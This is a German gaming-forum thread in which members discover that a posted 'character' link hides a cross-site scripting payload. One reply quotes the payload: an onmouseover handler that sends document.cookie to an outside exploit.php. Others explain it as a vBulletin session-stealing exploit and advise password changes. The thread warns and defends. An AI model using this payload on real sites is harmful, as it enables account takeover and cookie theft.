Akzeptieren

Diese Website verwendet und setzt Cookies und teilweise auch Cookies von Diensten Dritter. Weiterführende Informationen erhalten Sie in der Datenschutzerklärung.

Seite 1 von 2 12 LetzteLetzte
Zeige Ergebnis 1 bis 10 von 13

Thema: Mein Heiliger Char

Standard Mein Heiliger Char

Link entfernt das is ma nen Char

2. Standard

oh... wirklich wahnsinnig aufregend! *gähn*

und nebenbei, auf dieser Seite is nix! Bloss alles weiss!

Danke für deinen spannenden Beitrag!

Standard vorsicht

achtung. das ist kein bild.
    wenn man sich den quelltext anguckt steht da

<pre a='>' onmouseover='document.location="http://server4free.se.ohost.de/Ex/exploit.php?c="+document.cookie' b='</pre' >

4. Standard

Lädt der Schweinehund so irgendwas auf mein PC`?

Standard

keine ahnung was das script "exploit.php" macht. auf jeden fall kann man mit cookies tricksen.

Standard

Am besten w&#228;r's wenn ein Board-Admin sowohl Link im Post als auch den Nutzer JackTheRipper l&#246;scht! Das kann alles m&#246;gliche sein und ich denke ehrlich gesagt nicht, dass da irgendwer draufklicken sollte!!!

Realität ist da, wo der Pizzamann herkommt!

Unsere T6 Raidcom auf Innovation: www.mysthome.de.ki

Qubic Guest

Standard

Das ist ein vBulletin-Exploit, der den Anmelde-Cookie des Opfers ausliest wenn er denn funktioniert hat und somit Zugriff auf den Account in diesem Forum gewährt!

Besser mal Kennwort ändern.

Gruß,
    Q

Standard

Wer macht denn bitte sowas? Kann man den nicht irgendwie &#252;ber seine IP zur&#252;ckverfolgen, die steht doch sicherlich in irgendeinem Foren-Logfile drin. W&#252;rd dem gern mal meine Meinung pers&#246;nlich &#252;berbringen

EDIT: Ich habe gerade mal eine Email an seinen Webspace-Anbieter geschickt, bei dem er das Skript aufgespielt hat, damit die seinen Account dort sperren.

Realität ist da, wo der Pizzamann herkommt!

Unsere T6 Raidcom auf Innovation: www.mysthome.de.ki

Qubic Guest

Standard

Asoziales Pack das sowas macht gibt es leider zu Genüge.
    Ich glaube das mit der mitgeloggten IP ist so ein zweischneidiges Schwert und bewegt sich auch eher in einer rechtlichen Grauzone. Einen kräftigen *****tritt würde ich dem Kerl allerdings auch am liebsten verpassen

Zitat Zitat von Dharis
    EDIT: Ich habe gerade mal eine Email an seinen Webspace-Anbieter geschickt, bei dem er das Skript aufgespielt hat, damit die seinen Account dort sperren.
    Hoffentlich interessieren sie sich dafür - auf jeden Fall eine gute Sache die zu informieren was für Schindluder auf deren Server getrieben wird. Abmahnung! ABMAHNUNG! Hihihi ... ich sollte mit dem Grog aufhören ...

10. Standard

Zwar wird die IP von dem Kerle mitgeloggt, allerdings m&#252;sste das ganze dann zur Anzeige kommen. Und in wie weit ich mich hier in auf rechtlicher Sicherheit bewege, das wei&#223; ich nicht, daf&#252;r ist dann ein fundiertes Wissen erforderlich was nur die wenigsten Webmaster besitzten. Das ist mit auch ein Grund f&#252;r die imens gro&#223;en Abmahnwellen.

Jedenfalls ist das Kiddi nun zu Bett gebrahct und wacht hoffentlich nicht mehr auf.

Zus&#228;tzlich empfehle ich jedem, der auf diesen Link geklickt hat sein Passwort hier im Forum zu &#228;ndern und sich NEU einzuloggen.

Gefahr sollte an dieser Stelle keine bestehen, da die Informationen in diesem Cookie verschl&#252;sselt abgelegt werden. Doch kann der &#220;belt&#228;ter den Account nutzen ohne das Passwort wissen zu m&#252;ssen.

Molgam Network alles Rund um MMORPGs.
    Webdim Media, Webdesign, CMS und mehr!
    truefun.de, Wahrer Spaß - Bilder, Babes, Videos, Games, Witze und anderes!
    ■ Gilden: VSoH - Die Aggronauten || EQ2 - Die Gemeinde

Seite 1 von 2 12 LetzteLetzte